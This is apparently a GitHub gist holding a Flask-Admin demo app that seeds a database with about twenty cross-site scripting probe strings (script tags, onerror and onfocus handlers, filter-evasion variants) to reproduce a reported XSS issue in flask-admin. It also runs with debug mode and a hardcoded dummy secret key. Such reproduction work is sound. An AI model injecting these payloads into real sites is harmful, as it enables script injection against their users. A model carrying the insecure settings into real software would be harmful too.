Skip to content

Instantly share code, notes, and snippets.

@boolbag
Forked from pawl/security_risk.py
Last active August 29, 2015 14:27
Show Gist options
  • Save boolbag/a6e3f08d086716ba9eef to your computer and use it in GitHub Desktop.
Save boolbag/a6e3f08d086716ba9eef to your computer and use it in GitHub Desktop.
"Security Risk"
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import flask_admin as admin
from flask_admin.contrib import sqla
# Create application
app = Flask(__name__)
# Create dummy secrey key so we can use sessions
app.config['SECRET_KEY'] = '123456790'
# Create in-memory database
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///sample_db_2.sqlite'
app.config['SQLALCHEMY_ECHO'] = True
db = SQLAlchemy(app)
# Flask views
@app.route('/')
def index():
return '<a href="/admin/">Click me to get to Admin!</a>'
class Car(db.Model):
__tablename__ = 'cars'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
desc = db.Column(db.Text)
def __unicode__(self):
return self.desc
class CarAdmin(sqla.ModelView):
column_editable_list = ('desc', )
# Create admin
admin = admin.Admin(app, name='Example: SQLAlchemy2', template_mode='bootstrap3')
# admin.add_view(sqla.ModelView(Car, db.session))
admin.add_view(CarAdmin(Car, db.session))
if __name__ == '__main__':
# Create DB
db.drop_all()
db.create_all()
db.session.add(Car(desc='<h1>hello</h1>'))
db.session.add(Car(desc='<script>alert(123)</script>'))
db.session.add(Car(desc='<img src=x onerror=alert(123) />'))
db.session.add(Car(desc='<svg><script>123<1>alert(123)</script> '))
db.session.add(Car(desc='"><script>alert(123)</script>'))
db.session.add(Car(desc='><script>alert(123)</script>'))
db.session.add(Car(desc='</script><script>alert(123)</script>'))
db.session.add(Car(desc='< / script >< script >alert(123)< / script >'))
db.session.add(Car(desc=' onfocus=JaVaSCript:alert(123) autofocus '))
db.session.add(Car(desc='" onfocus=JaVaSCript:alert(123) autofocus '))
db.session.add(Car(desc='<sc<script>ript>alert(123)</sc</script>ript>'))
db.session.add(Car(desc='--><script>alert(123)</script>'))
db.session.add(Car(desc='";alert(123);t="'))
db.session.add(Car(desc='JavaSCript:alert(123)'))
db.session.add(Car(desc=';alert(123);'))
db.session.add(Car(desc='src=JaVaSCript:prompt(132)'))
db.session.add(Car(desc='"><script>alert(123);</script x="'))
db.session.add(Car(desc='><script>alert(123);</script x='))
db.session.add(Car(desc='" autofocus onkeyup="javascript:alert(123)'))
db.session.commit()
# Start app
app.run(debug=True)
@boolbag
Copy link
Author

boolbag commented Aug 20, 2015

Reproduces this issue in flask-admin.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment